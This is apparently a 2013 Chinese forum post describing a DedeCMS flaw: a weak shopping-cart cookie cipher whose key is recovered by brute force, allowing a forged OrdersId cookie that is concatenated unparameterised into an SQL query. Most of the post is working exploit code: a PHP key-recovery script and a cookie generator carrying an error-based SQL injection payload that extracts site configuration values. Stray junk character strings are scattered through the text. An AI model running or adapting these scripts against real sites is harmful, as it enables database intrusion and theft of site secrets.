标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
239 function saveCookie($key,$value)
240 {
241 if(is_array($value))
242 {
243 $value = $this->enCrypt($this->enCode($value));
244 }
245 else
246 {
247 $value = $this->enCrypt($value);
248 }
249 setcookie($key,$value,time()+36000,’/');
250 }
简单地说,$key 就是 cookie 的名称,$value 就是 cookie 的值;enCode 的作用是把数组转换成 a=yy&b=cc&d=know 这样的查询字符串形式,关键在于 enCrypt 函数。
186 function enCrypt($txt)
187 {
188 srand((double)microtime() * 1000000);
189 $encrypt_key = md5(rand(0, 32000));
190 $ctr = 0;
191 $tmp = ”;
192 for($i = 0; $i < strlen($txt); $i++)
193 {
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
196 }
197 return base64_encode($this->setKey($tmp));
198 }
213 function setKey($txt)
214 {
215 global $cfg_cookie_encode;
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
217 $ctr = 0;
218 $tmp = ”;
& `$ k* K: N* Q
219 for($i = 0; $i < strlen($txt); $i++)
220 {
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223 }
224 return $tmp;
225 }
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
我们的目的是推测出 setKey 中 $encrypt_key 的值,也就是 md5(strtolower($cfg_cookie_encode)),只有拿到它才能任意构造购物车的 cookie。enCrypt 调用 setKey 时传入的参数 $tmp,在某种意义上也是可知的:enCrypt 内部的 $encrypt_key = md5(rand(0, 32000)) 只有 32000 种可能,而明文 $txt 已知,所以可以枚举出 32000 种可能的 $tmp,再与已知的 cookie 值逐字节异或,就得到 32000 种可能的 md5(strtolower($cfg_cookie_encode))。简单过滤掉含有非字母数字字符的候选 key 之后,只剩下几百个可能的 key;然后重新下一次订单,再次得到几百个候选 key,两组取交集,即为最终的 key。
具体代码如下:
<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
$key = “”;
for($i=0 ; $i<32 ; $i++)
{
& h& f' b& E3 S
$key .= $string[$i] ^ $code[$i];
}
return $key;
}
function getKeys($cookie,$plantxt)
{
$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
{
$txt = $plantxt;
$ctr = 0;
$tmp = ”;
$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& v, j* c0 h, d
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
$string = $tmp;
$code = $cookie;
$result = reStrCode($code,$string);
if(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
$results[] = $result;
}
}
return $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
foreach($results1 as $test1)
{
foreach($results2 as $test2)
{
if($test1 == $test2)
& m2 k* F7 ~- G3 }% n" @. k7 t/ L
{
echo $test1.”\n”;
}
}
}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops
21 {
22 var $OrdersId;
23 var $productsId;
24
25 function __construct()
26 {
27 $this->OrdersId = $this->getCookie(“OrdersId”);
28 if(empty($this->OrdersId))
29 {
30 $this->OrdersId = $this->MakeOrders();
31 }
" S: R1 Z u D5 V7 z
32 }
可以看到 OrdersId 是直接从 cookie 里取出来的,构造函数中除了 empty() 判断之外没有任何校验
然后
& y4 a7 x$ _2 u! t
/plus/carbuyaction.php中的
29 $cart = new MemberShops();
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
……
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了:来自 cookie 的 $OrdersId 被直接拼接进第 173 行的 SQL 字符串,而没有使用参数化查询
" l/ }8 L( L+ J; M7 b
通过利用下面代码生成cookie:
<?php
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
& ?7 u2 `" N6 @) y0 }
function setKey($txt)
{
global $encrypt_key;
$ctr = 0;
& x. W/ L4 `, ]: G* ]. p) S h1 v
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
function enCrypt($txt)
{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
if(!strpos($dest,’+'))
" O* F" L+ f( k& w* }* z( A
{
break;
}
}
echo $dest.”\n”;
?>